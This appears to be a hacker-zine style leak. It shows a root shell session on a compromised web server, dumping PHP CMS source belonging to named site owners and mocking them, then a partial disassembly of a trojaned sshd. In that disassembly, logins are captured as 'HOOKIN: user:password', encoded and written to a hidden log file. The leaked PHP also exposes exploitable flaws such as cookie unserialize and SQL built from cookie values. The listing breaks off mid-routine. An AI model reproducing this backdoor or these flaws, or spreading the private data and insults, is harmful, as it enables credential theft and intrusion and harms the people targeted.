-rw-r--r--  1 romeo romeo  3054 Feb 14 06:17 page_footer.php
-rw-r--r--  1 romeo romeo  5935 Feb 14 06:17 page_header.php
-rw-r--r--  1 romeo romeo  9762 Feb  2 08:33 recaptchalib.php
-rw-r--r--  1 romeo romeo  6658 Apr 26 07:51 security.php
-rw-r--r--  1 romeo romeo  2021 Feb  2 08:33 usertracker.php
root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
core]# cat config.php
config = $config;
if(!defined('CMS_DEBUG')){ define('CMS_DEBUG', $config['cms']['debug']); }
if(!$_sql->connect(CMS_DEBUG)){ define('NO_DB', 1); }


//Open the session stuff
$_sess->sql = $_sql;
$_sess->config = $config;

//start the form class
$_form = new form;

//start the user class
$_user = new user;
$_user->config = $config;
$_user->sql = $_sql;


//start the login
$_login = new login((isset($config['site']['autologin']) ? true : false));
$_login->config = $config;
$_login->sql = $_sql;
$_login->form = $_form;
$_login->sess = $_sess;
$_login->user = $_user;
$_user->login = $_login;

//require($cms_root."core/key.php");

//start the time class
$_time = new time;
$_time->config = $config;

//start the bbcode class
$_bbcode = new bbcode;
$_bbcode->SetDebug(true);
$_bbcode->SetDetectURLs(false);
$_bbcode->SetURLPattern('{$text/h} External Link');
$_bbcode->ClearSmileys();
$_bbcode->SetSmileyDir('/'.root().'images/smilies');
include($cms_root."core/bbcode_tags.php");

$_bbcode->user = $_user;
$_user->bbcode = $_bbcode;

//start the cache && template classes
$_cache_path = $cms_root."cache/";
if (is_dir($_cache_path)){ @chmod($_cache_path, 0777); }
$_cache_ = (is_writable($_cache_path) ? true : false);
$_cache = new Cache($_sql, $_cache_path, $_cache_);
$_cache->config = $config['db'];

//regenerate the site cache
if($config!==NULL || !empty($config)){
    $config_db = $_cache->generate_cache("config_db", "cache_config.php",
"SELECT * FROM ".$config['db']['prefix']."config");
    foreach($config_db as $array){
	$config[$array['array']][$array['var']] = $array['value'];
    }
    unset($array,$config_db);
}

//start the template class
$_template = new template('.', $_cache_, $_cache_path."files/");
$_template->cms_root = $cms_root;
$_template->user = $_user;

$_login->template = $_template;

//start the language class
$_language = $config['site']['language'];
if(isset($_SESSION['user']['language'])){
   
    if(file_exists($cms_root."language/".$_SESSION['user']['language']."/main.php")){
	$_language = $_SESSION['user']['language'];
    }
}
require($cms_root."language/".$_language."/main.php");
$_time->cur_lang = $_language;

//run the lang pass function on the language vars AFTER we included the base functions.
foreach($_lang as $key => $value){
	if(!is_array($_lang[$key])){
		$_lang[$key] = lang_pass($_lang[$key]);
	}
}

$_time->lang = $_lang;
$_bbcode->lang = $_lang;
$_login->lang = $_lang;
//Include the security files.. recaptchalib maybe add into the login class
require($cms_root."core/security.php");

require($cms_root."core/classes/class.captcha.php");
$_captcha = new Captcha($config['site']['captcha_pub'],
$config['site']['captcha_priv']);

$_cms_root = $cms_root;
//Include the mailer
require($cms_root."core/mailer.php");
$cms_root = $_cms_root;

/////////////////////////////////////////////////////////////////////////////
//--Continue with the configuration----------------------------------------//
/////////////////////////////////////////////////////////////////////////////
define('ADMIN',     9);
define('DEV',	    8);
define('GMOD',	    7);
define('MOD',	    5);
define('USER',	    1);
define('BANNED',    0);

//add some stuff to the config

//generate guest defaults
$guest['user']['id'] = '0';
$guest['user']['username'] = 'Guest';
$guest['user']['theme'] = $config['site']['theme'];
$guest['user']['userkey'] = isset($_SESSION['user']['userkey']) ?
$_SESSION['user']['userkey'] : NULL;

//generate user stuff
$config['global']['user'] = (isset($_SESSION['user']['id']) ? $_SESSION['user']
: $guest['user']);
$config['global']['ip'] = getIP();
$config['global']['useragent'] = secureit(isset($_SERVER['HTTP_USER_AGENT']) ?
$_SERVER['HTTP_USER_AGENT'] : NULL);
$config['site']['guests_online'] = (isset($guests_online) &&
is_numeric($guests_online) ? $guests_online : 0);
$config['site']['users_online'] = (isset($_users_online) &&
is_numeric($_users_online) ? $_users_online : 0);
$_user->is_online = $_login->is_online = isset($_SESSION['user']['id']) ? true
: false;

#if(!isset($_SESSION['user']['id'])){$_SESSION['user'] = $guest['user'];}

$tpl = $config['site']['theme'];
if($config['site']['template_override']){
    if(!is_dir($cms_root.'template/'.$tpl.'/')){$tpl = 'vone';}
}else{
	if(isset($config['global']['user']['template']) &&
is_dir($cms_root."template/".$config['global']['user']['template']."/")){
		$tpl = $config['global']['user']['template'];
	}
}
$_template->config = $config;
$_template->tpl = $tpl;

//None of these should be defined as vars as they can be over writtin.. They are defines
$_module = (is_string(isset($_GET['module'])) ? $_GET['module'] :
$config['site']['default_module']);
$_user_temp = $cms_root."template/".$tpl."/";
$_module_temp = $cms_root."modules/".$_module."/template/";

if(isset($_SESSION['login']) && isset($_SESSION['user']['id'])){
	unset($_SESSION['login']);
}

$_template->set_rootdir($cms_root);

define('IS_MOD',    $_user->check_permissions($config['global']['user']['id'],
MOD));
define('IS_GMOD',   $_user->check_permissions($config['global']['user']['id'],
GMOD));
define('IS_DEV',    $_user->check_permissions($config['global']['user']['id'],
DEV));
define('IS_ADMIN',  $_user->check_permissions($config['global']['user']['id'],
ADMIN));

/////////////////////////////////////////////////////////////////////////////
//--Grab the neccesarry cache files----------------------------------------//
/////////////////////////////////////////////////////////////////////////////
//this defines which of the cache files to include
//require($cms_root.'core/cacher.php');

   
/////////////////////////////////////////////////////////////////////////////
//--Cacher.php-------------------------------------------------------------//
/////////////////////////////////////////////////////////////////////////////
$cache_gen = array('statistics', 'menu', 'minimenu', 'groups', 'bans',
'user_permissions', NULL);#'badwords', 'affiliates',
$x=0;
include($cms_root."cache/cache.php");
while($var = $cache_gen[$x]){
    if($var != ''){
	$gen = NULL;
	    eval('$gen = $'.$var.'_db;');

	    /*if(file_exists($cms_root.'cache/cache_'.$var.'.php')){
		include($cms_root."cache/cache_".$var.".php");
		eval('$gen = $'.$var.'_db;');
		}*/
		if ($gen !== NULL || !empty($gen)){
			foreach($gen as $k => $v){
		    $config[$var][$k] = $v;
		}
		}else{
		//regenerate the cache if not avalible
		    switch($var){
		    case 'config':
			$config[$var] = $_cache->generate_cache("config_db",
"cache_config.php", "SELECT * FROM ".$config['db']['prefix']."config", NNUM);
		    break;
		    case 'minimenu':
			$config[$var] = $_cache->generate_cache("minimenu_db",
"cache_minimenu.php", "SELECT * FROM ".$config['db']['prefix']."mmenus ORDER BY
disporder ASC");
		    break;

		    case 'menu':
			$config[$var] = $_cache->generate_cache("menu_db",
"cache_menu.php", "SELECT * FROM ".$config['db']['prefix']."menus ORDER BY id
ASC", NNUM);
		    break;

		    case 'statistics':
			$config[$var] = $_cache->generate_statistics_cache();
		    break;

		    case 'groups':
			$config[$var] = $_cache->generate_cache("groups_db",
"cache_groups.php", "SELECT * FROM ".$config['db']['prefix']."groups ORDER BY
rank DESC");
		    break;
		    case 'bans':
			$config[$var] = $_cache->generate_cache("bans_db",
"cache_bans.php", "SELECT * FROM ".$config['db']['shrfix']."banned");
		    break;
		    //case 'affiliates':
		    //	  $config[$var] =
$_cache->generate_cache("affiliates_db", "cache_affiliates.php", "SELECT * FROM
".$config['db']['prefix']."affiliates");
		    //break;
		    //case 'module_permissions':
		    //	  $config[$var] =
$_cache->generate_cache("module_permissions_db",
"cache_module_permissions.php", "SELECT * FROM
".$config['db']['prefix']."module_permissions");
		    //break;
		    case 'user_permissions':
			$config[$var] = $_cache->generate_upermissions_cache();

		    break;
		}

	}
	}
	$x++;
}
   
/////////////////////////////////////////////////////////////////////////////
//--Cacher.php-------------------------------------------------------------//
/////////////////////////////////////////////////////////////////////////////


$_user->groups = $config['groups'];
//$_user->module_permissions = $config['module_permissions'];
$_user->permissions = $config['user_permissions'];

/////////////////////////////////////////////////////////////////////////////
//--Cron - This will sort the majority of the cache and--------------------//
//---------db problems out for us------------------------------------------//
/////////////////////////////////////////////////////////////////////////////

//include($cms_root.'core/cron.php');

   
/////////////////////////////////////////////////////////////////////////////
//--Cron.php---------------------------------------------------------------//
/////////////////////////////////////////////////////////////////////////////

if(!defined('NO_DB')){
    $hourly_cron = FALSE;
    if(isset($config['site']['hourly_time'])){
	if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
		$_sql->updateRow("statistics", array('value' => time()),
"variable = 'hourly_cron'");
		$hourly_cron = TRUE;
	} else {
		if($config['site']['hourly_time'] == 0){
			$hourly_cron = TRUE;
		}else{
			if((time() - $config['site']['hourly_time']) > 
$config['statistics']['hourly_cron']){
				$_sql->updateRow("statistics", array('value' =>
time()), "variable = 'hourly_cron'");
				$hourly_cron = TRUE;
			}
		}
	}
    }

    $daily_cron = FALSE;
    if(isset($config['site']['daily_time'])){
	if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
		$_sql->updateRow("statistics", array('value' => time()),
"variable = 'daily_cron'");
		$daily_cron = TRUE;
	} else {
		if($config['site']['daily_time'] == 0){
			$daily_cron = TRUE;
		}else{
			if((time() - $config['site']['daily_time']) > 
$config['statistics']['daily_cron']){
				$_sql->updateRow("statistics", array('value' =>
time()), "variable = 'daily_cron'");
				$daily_cron = TRUE;
			}
		}
	}
    }

    $weekly_cron = FALSE;
    if(isset($config['site']['weekly_time'])){
	if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
		$_sql->updateRow("statistics", array('value' => time()),
"variable = 'weekly_cron'");
		$weekly_cron = TRUE;
	} else {
		if($config['site']['weekly_time'] == 0){
			$weekly_cron = TRUE;
		}else{
			if((time() - $config['site']['weekly_time']) > 
$config['statistics']['weekly_cron']){
				$_sql->updateRow("statistics", array('value' =>
time()), "variable = 'weekly_cron'");
				$weekly_cron = TRUE;
			}
		}
	}
    }
}

$stat_cache = false;
if(!defined('NO_DB')){
	if($hourly_cron){
	    $_sql->record_message('Hourly CRON is running');
		//delete users from sql that are inactive and set users offline that are inactive too
		$_sql->query("UPDATE shr_users
	    SET timestamp = ( SELECT cs_online.timestamp FROM cs_online WHERE
cs_online.uid = shr_users.id)
	    WHERE EXISTS
	      ( SELECT cs_online.timestamp FROM cs_online WHERE cs_online.uid =
shr_users.id)");
		$_sql->deleteRow('online', "login_time <
".$_time->mod_time(time(), 0, 20, 0, 'TAKE')." AND timestamp <
".$_time->mod_time(time(), 0, 20, 0, 'TAKE'));
		$_sql->query('DELETE FROM `shr_banned` WHERE `user_ip` LIKE
"66.249%"');
		$_cache->generate_statistics_cache();
		$stat_cache = true;

	}

	if($daily_cron){
	    $_sql->record_message('Daily CRON is running');
		//update caches
		if(!$stat_cache){
		$_cache->generate_statistics_cache();
		$stat_cache = true;
	}

	if($config['forum']['auto_lock']){
	    //Auto Lock Thread Timer
	    $ex = $_time->mk_time(time()-$config['forum']['auto_lock_cron'],
'', 1);
	    $_sql->updateRow('forum_topics', array('locked'=>1), "last_poster
<= $ex", 1);
	}

	$_sql->query("DELETE FROM ".$config['db']['shrfix']."pastebin WHERE
expire < ".time()."");

		$_cache->generate_upermissions_cache();
	$_cache->generate_cache("minimenu_db", "cache_minimenu.php", "SELECT *
FROM ".$config['db']['prefix']."mmenus ORDER BY disporder ASC");
		$_cache->generate_cache("menu_db", "cache_menu.php", "SELECT *
FROM ".$config['db']['prefix']."menus ORDER BY id ASC", NNUM);
	    //$_cache->generate_cache("module_permissions_db",
"cache_module_permissions.php", "SELECT * FROM
".$config['db']['prefix']."module_permissions");

	}

	if($weekly_cron){
	    $_sql->record_message('Weekly CRON is running');
		if(!$stat_cache){
		$_cache->generate_statistics_cache();
		$stat_cache = true;
	}

	$_cache->generate_cache("config_db", "cache_config.php", "SELECT * FROM
".$config['db']['prefix']."config");
	    $_cache->generate_cache("groups_db", "cache_groups.php", "SELECT *
FROM ".$config['db']['prefix']."groups ORDER BY rank DESC");

	//Optimise all of the tables in the DB
		$alltables = $_sql->getTable("SHOW TABLES");
	    $tables = '';
	    $counter = count($alltables);
	    $x = 0;
	    $add = ", ";
	    foreach($alltables as $table){
		foreach ($table as $tablename){
			if($x == ($counter-1)){
				$add = '';
			}
			$tables .= "`$tablename`$add";
			$x++;
		}
	    }
	    $_sql->query("OPTIMIZE TABLE $tables");
	    $_sql->updateRow("statistics", array('value' => time()), "variable
= 'weekly_time'", FALSE);
	}

	if($weekly_cron || $daily_cron || $hourly_cron){
	define('FILE_MERGE', 1);
	include($cms_root.'merge.php');
	}
}
   
/////////////////////////////////////////////////////////////////////////////
//--Cron.php---------------------------------------------------------------//
/////////////////////////////////////////////////////////////////////////////

/////////////////////////////////////////////////////////////////////////////
//--Check weather the site is closed---------------------------------------//
/////////////////////////////////////////////////////////////////////////////
if (($config['site']['closed'] == 1) && (!defined("CMS_CLOSED"))){
	if (!$_user->check_permissions($config['global']['user']['id'],
ADMIN)){
		die(die_error(4));
	}
}

/////////////////////////////////////////////////////////////////////////////
//--Check weather a user is banned-----------------------------------------//
/////////////////////////////////////////////////////////////////////////////
/**
if ($config['bans'] != NULL){
	foreach ($config['bans'] as $bans){
		if ($bans['user_ip'] == $config['global']['ip']){
			die(die_error($bans['die']));
		}
	}
}
**/

/////////////////////////////////////////////////////////////////////////////
//--Sort out the guests & users online stuff-------------------------------//
/////////////////////////////////////////////////////////////////////////////

//include($cms_root.'core/usertracker.php');

   
/////////////////////////////////////////////////////////////////////////////
//--UserTracker.php--------------------------------------------------------//
/////////////////////////////////////////////////////////////////////////////
if(!defined('NO_DB') && !defined('NO_LOG')){

if(!isset($_SESSION['user']['userkey'])){
    //cookie check
    if(!$_user->is_online){
		if(isset($_COOKIE[$config['db']['ckefix'].'login']) &&
!empty($_COOKIE[$config['db']['ckefix'].'login'])){
	    $cookie = unserialize($_COOKIE[$config['db']['ckefix'].'login']);
	    if(isset($cookie[1]) && (int)isset($cookie[0])){
			if($cookie[1] ==
$_login->mk_passwd($_SERVER['HTTP_USER_AGENT'], $config['db']['ckeauth'])){
			    if($config['login']['autologinIpRestriction']) $aq
= " AND user_ip = '".getIP()."'";
			$query = $_sql->getTable("SELECT uid FROM
".$config['db']['shrfix']."userkeys WHERE uid = '".$cookie[0]."' AND user_agent
= '".$cookie[1]."'".(isset($aq) ? $aq : '')." LIMIT 1;");
				if (count($query) == 1){
				    $user = $_sql->getTable("SELECT timestamp
FROM ".$config['db']['shrfix']."users WHERE id = '".$cookie[0]."' LIMIT 1");
				    if($user!==NULL){
					$user = $user[0];
					       
$_sess->set_sessions($cookie[0]);

						$_SESSION['user']['last_visit']
= $user['timestamp'];
			    $_user->new_user($cookie[0], 'alogin');

			       
if($_user->get_new_threads($_SESSION['user']['last_visit']))
				setNotification('We have just updated your
forum icons to reflect new posts.', 'Forum Icons Updated', false,
$_SESSION['user']['id']);
			    $config['global']['user']['id'] =
$_SESSION['user']['id'];
					}
				}else{//if count query == 1
				setcookie($config['db']['ckefix']."login",
null, time() - 31536000);    //set cookie to remember me
			       
unset($_COOKIE[$config['db']['ckefix']."login"]);
		    }
			}else{ //if cookie == http user agent
				setcookie($config['db']['ckefix']."login",
null, time() - 31536000);    //set cookie to remember me
			       
unset($_COOKIE[$config['db']['ckefix']."login"]);
		}
		}else{//if cookie info == valid
			setcookie($config['db']['ckefix']."login", null, time()
- 31536000);	//set cookie to remember me
			unset($_COOKIE[$config['db']['ckefix']."login"]);
	    }
		redirect($_SERVER["PHP_SELF"]);

	}
    }
	$_user->new_user($config['global']['user']['id']);
}else{
    $return = $_user->update_location();
    if($return == 0){
	$_user->new_user($config['global']['user']['id']);
    }
}

}
   
/////////////////////////////////////////////////////////////////////////////
//--UserTracker.php--------------------------------------------------------//
/////////////////////////////////////////////////////////////////////////////

/**
 * Thanks to Jesus for this baby, this will add the level of sanitation required for the diffrent data types
 */
function secureit($string, $type=''){
	switch($type){
		case 'post':
			$string = mysql_real_escape_string($string);
		break;
		default:
			$string = mysql_real_escape_string($string);
			$string = htmlentities($string);
			$string = stripslashes($string);
			$string = strip_tags($string);
		break;
	}
	return $string;
}
if (isset($_GET['code']) &&
$_user->check_permissions($config['global']['user']['id'], DEV)) {
    $explode = explode('/', $_SERVER['PHP_SELF']);
    die(highlight_file($explode[count($explode)-1], 1));
}
?>root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
core]# less Gre.php
config = $config;
:if(!defined('CMS_DEBUG')){ define('CMS_DEBUG', $config['cms']['debug']); }
:if(!$_sql->connect(CMS_DEBUG)){ define('NO_DB', 1); }
:
:
://Open the session stuff
:$_sess->sql = $_sql;
:$_sess->config = $config;
:
://start the form class
:$_form = new form;
:
://start the user class
:$_user = new user;
:$_user->config = $config;
:$_user->sql = $_sql;
root@server2:/home/romeo/domains[root@server2 domains]# cd cybershade.org/

# RoMeO's butt buddy xlink aka mad php c0d3r
root@server2:/home/romeo/domains/cybershade.org[root@server2 cybershade.org]#
ls -al 
drwxr-xr-x  2 romeo romeo 4096 Dec 23 14:31 .htpasswd
drwxr-xr-x  2 root  root  4096 May 23 00:10 logs
drwx--x--x  3 romeo romeo 4096 Dec 23 14:31 public_ftp
drwxr-xr-x 13 romeo romeo 4096 May 19 22:42 public_html
drwxr-xr-x  2 root  root  4096 May  1 00:10 stats
root@server2:/home/romeo/domains/cybershade.org[root@server2 cybershade.org]#
cd public_html/
root@server2:/home/romeo/domains/cybershade.org/public_html[root@server2
public_html]# ls -al
total 1188
drwxr-xr-x 13 romeo romeo   4096 May 19 22:42 .
drwx--x--x  7 romeo romeo   4096 Feb 10 19:26 ..
-rwxr-xr-x  1 romeo romeo    515 Feb 10 19:31 400.shtml
-rwxr-xr-x  1 romeo romeo    515 Feb 10 19:31 401.shtml
-rwxr-xr-x  1 romeo romeo    515 Feb 10 19:31 403.shtml
-rwxr-xr-x  1 romeo romeo    515 Feb 10 19:31 404.shtml
-rwxr-xr-x  1 romeo romeo    515 Feb 10 19:31 500.shtml
-rw-r--r--  1 romeo romeo   5254 Feb 16 08:01 acp.php
-rw-r--r--  1 romeo romeo   9757 Feb 16 08:01 ajax.php
-rw-r--r--  1 romeo romeo   2118 Feb 16 08:01 articles.php
drwxrwxrwx  5 romeo romeo   4096 Feb 10 19:31 cache
drwxr-xr-x  2 romeo romeo   4096 Feb 10 19:31 cgi-bin
-rw-r--r--  1 romeo romeo   5561 Feb 16 08:01 challenges.php
-rw-r--r--  1 romeo romeo 466963 Mar  1 14:51 cms_docs.zip
-rw-r--r--  1 romeo romeo   2137 Feb 10 19:31 codebase.php
-rw-r--r--  1 romeo romeo  17251 Feb 10 19:31 convertor.php
drwxr-xr-x  6 romeo romeo   4096 Feb 10 19:31 core
-rw-r--r--  1 romeo romeo      0 Feb 10 19:31 debug
-rw-r--r--  1 romeo romeo   3266 Feb 10 19:31 eg.gif
-rw-r--r--  1 romeo romeo  28213 Mar 20 12:59 farm.php
-rw-r--r--  1 romeo romeo   5020 Feb 16 08:01 forgotpass.php
-rw-r--r--  1 romeo romeo   7097 Feb 19 14:12 forum.php
-rw-r--r--  1 romeo romeo   2110 Feb 16 08:01 get_shouts.php
-rw-r--r--  1 romeo romeo   4546 Feb 19 14:12 .htaccess
-rw-r--r--  1 romeo romeo     36 Feb 10 19:31 .htpasswd
drwxr-xr-x  4 romeo romeo   4096 Feb 10 19:31 images
drwxr-xr-x  2 romeo romeo   4096 Feb 10 19:31 img
-rw-r--r--  1 romeo romeo   3998 Feb 16 08:01 index.php
-rw-r--r--  1 romeo romeo    843 Feb 16 08:01 irc.php
drwxr-xr-x  3 romeo romeo   4096 Feb 10 19:31 language
-rw-r--r--  1 romeo romeo   4103 Feb 19 14:12 latest_posts.php
-rwxr-xr-x  1 romeo romeo   7184 Feb 16 08:01 loader.php
-rw-r--r--  1 romeo romeo   8398 Feb 16 08:01 login.php
-rwxr-xr-x  1 romeo romeo  13954 Feb 10 19:31 logo.jpg
-rw-r--r--  1 romeo romeo   3006 Feb 16 08:01 merge.php
drwxr-xr-x 20 romeo romeo   4096 Feb 17 09:01 modules
-rw-r--r--  1 romeo romeo  10964 Feb 16 08:01 pastebin.php
-rw-r--r--  1 romeo romeo  35466 Feb 19 14:39 post.php
-rw-r--r--  1 romeo romeo   2142 Feb 16 08:01 privatemessages.php
-rw-r--r--  1 romeo romeo   9755 Feb 21 09:08 register.php
-rw-r--r--  1 romeo romeo   7986 Feb 16 08:01 rss.php
drwxr-xr-x  2 romeo romeo   4096 Feb 10 19:31 scripts
-rw-r--r--  1 romeo romeo   1065 Feb 16 08:01 search.php
-rw-r--r--  1 romeo romeo   1838 Feb 16 08:01 settings.php
drwxr-xr-x  8 romeo romeo   4096 Mar 19 10:13 skin
-rw-r--r--  1 romeo romeo 196608 Mar 19 10:20 skin.tgz
-rw-r--r--  1 romeo romeo    636 Feb 16 08:01 staff.php
-rw-r--r--  1 romeo romeo 133049 May 23 04:00 stress_test.txt
-rw-r--r--  1 romeo romeo    994 Feb 10 19:31 swiigle_upload.php
drwxr-xr-x  5 romeo romeo   4096 Feb 16 19:13 template
-rw-r--r--  1 romeo romeo    454 Feb 10 19:31 template.php
-rw-r--r--  1 romeo romeo    590 Feb 10 19:31 test.php
drwxr-xr-x  2 romeo romeo   4096 Feb 10 19:31 txt docs
-rw-r--r--  1 romeo romeo   2708 Feb 16 08:01 ucp.php
-rw-r--r--  1 romeo romeo   8546 Feb 19 14:12 view_group.php
-rw-r--r--  1 romeo romeo    876 Feb 16 08:01 view_profile.php
-rw-r--r--  1 romeo romeo  12838 Feb 19 14:12 view_topic.php
-rw-r--r--  1 romeo romeo   9571 Feb 16 08:01 windowed_options.php
root@server2:/home/romeo/domains/cybershade.org/public_html[root@server2
public_html]# cd core
root@server2:/home/romeo/domains/cybershade.org/public_html/core[root@server2
core]# ls -al
total 164
drwxr-xr-x  6 romeo romeo  4096 Feb 10 19:31 .
drwxr-xr-x 13 romeo romeo  4096 May 19 22:42 ..
-rw-r--r--  1 romeo romeo   731 Feb 10 19:31 admin.js
-rw-r--r--  1 romeo romeo 27175 Feb 16 19:00 base_functions.php
-rw-r--r--  1 romeo romeo  9266 Feb 16 19:00 bbcode_tags.php
-rw-r--r--  1 romeo romeo  2816 Feb 10 19:31 cacher.php
drwxr-xr-x  4 romeo romeo  4096 Feb 10 19:31 classes
-rw-r--r--  1 romeo romeo  1376 Feb 16 19:00 cli.php
-rw-r--r--  1 romeo romeo  2847 Feb 10 19:33 config.php
-rw-r--r--  1 romeo romeo 23727 Feb 17 09:53 core.php
-rw-r--r--  1 romeo romeo  4518 Feb 10 19:31 cron.php
drwxr-xr-x  2 romeo romeo  4096 Feb 10 19:31 err
-rw-r--r--  1 romeo romeo   236 Feb 16 19:00 force_user.php
drwxr-xr-x  2 romeo romeo  4096 Feb 10 19:31 functions
-rw-r--r--  1 romeo romeo  1181 Feb 16 19:00 key.php
-rw-r--r--  1 romeo romeo  6903 Feb 16 19:00 mailer.php
drwxr-xr-x  6 romeo romeo  4096 Feb 10 19:31 mint
-rw-r--r--  1 romeo romeo  3054 Feb 16 19:00 page_footer.php
-rw-r--r--  1 romeo romeo  6429 Feb 16 19:00 page_header.php
-rw-r--r--  1 romeo romeo  9762 Feb 16 19:00 recaptchalib.php
-rw-r--r--  1 romeo romeo  6601 Apr  5 12:58 security.php
-rw-r--r--  1 romeo romeo  2760 Feb 16 19:00 usertracker.php
root@server2:/home/romeo/domains/cybershade.org/public_html/core[root@server2
core]# less config.php
      < 
\  \_/   \>    <\  \_/   \/   --   \
 \_____  /__/\_ \\_____  /\______  /
       \/      \/      \/        \/ 
__________                __       .___                   
\______   \_____    ____ |  | __ __| _/____   ___________ 
 |    |  _/\__  \ _/ ___\|  |/ // __ |/  _ \ /  _ \_  __ \
 |    |   \ / __ \\  \___|     |  <_> )  | \/
 |______  /(____  /\___  >__|_ \____ |\____/ \____/|__|   
        \/      \/     \/     \/    \/                    
___________________ ___________
\______   \_   ___ \\_   _____/
 |       _/    \  \/ |    __)_ 
 |    |   \     \____|        \
 |____|_  /\______  /_______  /
        \/        \/        \/ 


char abuff[1024];
char sbuff[1024];
char * aSSSSSS = "%s%s\t [ %s %s %s %s ]"; //db '%s%s',9,' [ %s %s %s %s ]',0Ah
char * a0m = "\x1B[0m"; //db 1Bh,'[0m',0
char * aOwned ="see below";
char * aAGb7 = "a-gb7";
/*
.rodata:08078D34 aOwned          db 0Ah                  ; DATA XREF: do_motd+DFo
.rodata:08078D34                 db 9,9,'+----------------------------[ Owned ]-------------------------'
.rodata:08078D34                 db '---+',0Ah
.rodata:08078D34                 db 9,9,'|          Hack everyone you can and then hack some more       '
.rodata:08078D34                 db '   |',0Ah
.rodata:08078D34                 db 9,9,'|                           Owned[DC] v2                       '
.rodata:08078D34                 db '   |',0Ah
.rodata:08078D34                 db 9,9,'|                   _______ . _______ . _______                '
.rodata:08078D34                 db '   |',0Ah
.rodata:08078D34                 db 9,9,'|             Get in as anonymous, Leave with no trace.        '
.rodata:08078D34                 db '   |',0Ah
.rodata:08078D34                 db 9,9,'|                                                              '
.rodata:08078D34                 db '   |',0Ah
.rodata:08078D34                 db 9,9,'+--------------------------------------------------------------'
.rodata:08078D34                 db '---+',0Ah,0
*/
char * a033031mOwned03 = "\[\033[0;31m\]Owned\[\033[1;30m\][\[\033[1;37m\]DC\[\033[1;30m\]]:[\033[1;32m\]\w\[\033[1;30m\]]\[\033[1;30m\]\$\[\033[0m\] ";
char s[1024];
char * filename = "/var/run/ssh.old";
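int i = 0; //ds:ai is a dword, compared signed (jle) in the loop below
size_t len;
FILE * log;
int hookarOn; //ds:hookarOn, the flag the hooks below set and test
char * HookinSS = "HOOKIN: %s:%s\n"; //newline as shown in the disassembly
char * a0x3aownt = "0x3aownt";
char * aSk3rhgldyw = "Sk3rhGLdYW";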


//known structs

struct passwd {
	char *pw_name;
	char *pw_passwd;
	uid_t pw_uid;
	gid_t pw_gid;
	time_t pw_change;
	char *pw_class;
	char *pw_gecos;
	char *pw_dir;
	char *pw_shell;
	time_t pw_expire;
}; 


struct Authctxt {
	int		 success;
	int		 postponed;	/* authentication needs another step */
	int		 valid;		/* user exists and is allowed to login */
	int		 attempt;
	int		 failures;
	int		 force_pwchange;
	char		*user;		/* username sent by the client */
	char		*service;
	struct passwd	*pw;		/* set if 'valid' */
	char		*style;
	void		*kbdintctxt;
#ifdef BSD_AUTH
	auth_session_t	*as;
#endif
#ifdef KRB5
	krb5_context	 krb5_ctx;
	krb5_ccache	 krb5_fwd_ccache;
	krb5_principal	 krb5_user;
	char		*krb5_ticket_file;
	char		*krb5_ccname;
#endif
	Buffer		*loginmsg;
	void		*methoddata;
};

struct utsname {
	char	sysname[_SYS_NMLN];
 	char	nodename[_SYS_NMLN];
 	char	release[_SYS_NMLN];
 	char	version[_SYS_NMLN];
 	char	machine[_SYS_NMLN];
};

/* sys_auth_passwd
.text:0804FA98                 push    edi
.text:0804FA99                 push    dword ptr [esi] ; esi = arg_0 + 20h
.text:0804FA99                                         ; authctxt->pw
.text:0804FA99                                         ; [esi] = pw->pw_name
.text:0804FA9B                 push    offset aHookinSS ; "HOOKIN: %s:%s\n"
.text:0804FAA0                 push    offset abuff    ; s
.text:0804FAA5                 call    _sprintf
.text:0804FAAA                 mov     edi, offset abuff ; start: strlen(abuff)
.text:0804FAAF                 xor     eax, eax
.text:0804FAB1                 cld
.text:0804FAB2                 mov     ecx, 0FFFFFFFFh
.text:0804FAB7                 repne scasb
.text:0804FAB9                 not     ecx
.text:0804FABB                 lea     edx, [ecx-1]
.text:0804FABE                 add     esp, 10h
.text:0804FAC1                 cmp     ebx, edx        ; fin;
.text:0804FAC3                 mov     ds:alen, edx    ; alen = strlen result
.text:0804FAC9                 mov     ds:ai, 0        ; for(ai = 0
.text:0804FAD3                 jg      short loc_804FAE8
.text:0804FAD5                 xor     eax, eax
.text:0804FAD7                 nop
.text:0804FAD8
.text:0804FAD8 loc_804FAD8:                            ; CODE XREF: sys_auth_passwd+CDj
.text:0804FAD8                 not     ds:abuff[eax]
.text:0804FADE                 inc     eax             ; eax++ (ai++)
.text:0804FADF                 cmp     eax, edx        ; ;ai<=edx (alen)
.text:0804FAE1                 jle     short loc_804FAD8
.text:0804FAE3                 mov     ds:ai, eax
.text:0804FAE8
.text:0804FAE8 loc_804FAE8:                            ; CODE XREF: sys_auth_passwd+BFj
.text:0804FAE8                 sub     esp, 8
.text:0804FAEB                 push    (offset aDsa_0+2) ; aDsa = db 'dsa',0 | aDsa+2h = 'a',0
.text:0804FAF0                 push    offset filename ; "/var/run/ssh.old"
.text:0804FAF5                 call    _fopen          ; fopen(filename,"a")
.text:0804FAFA                 add     esp, 10h
.text:0804FAFD                 test    eax, eax        ; if(fopen(...) != NULL)
.text:0804FAFD                                         ;  jump
.text:0804FAFF                 mov     ds:alog, eax
.text:0804FB04                 jnz     short loc_804FB3B
.text:0804FB06
.text:0804FB06 loc_804FB06:                            ; CODE XREF: sys_auth_passwd+149j
.text:0804FB06                 sub     esp, 8
.text:0804FB09                 push    1B6h            ; mode (0666)
.text:0804FB0E                 push    offset filename ; "/var/run/ssh.old"
.text:0804FB13                 call    _chmod          ; chmod(filename,0666)
.text:0804FB18                 lea     esp, [ebp-0Ch]
.text:0804FB1B                 pop     ebx
.text:0804FB1C                 pop     esi
.text:0804FB1D                 mov     eax, 1
.text:0804FB22                 pop     edi
.text:0804FB23                 leave
.text:0804FB24                 retn                    ; return 1
.text:0804FB24 ; ---------------------------------------------------------------------------
.text:0804FB25                 align 4
.text:0804FB28
.text:0804FB28 loc_804FB28:                            ; CODE XREF: sys_auth_passwd+17j
.text:0804FB28                 sub     esp, 0Ch
.text:0804FB2B                 push    esi
.text:0804FB2C                 call    shadow_pw
.text:0804FB31                 mov     ebx, eax
.text:0804FB33                 add     esp, 10h
.text:0804FB36                 jmp     loc_804FA34
.text:0804FB3B ; ---------------------------------------------------------------------------
.text:0804FB3B
.text:0804FB3B loc_804FB3B:                            ; CODE XREF: sys_auth_passwd+F0j
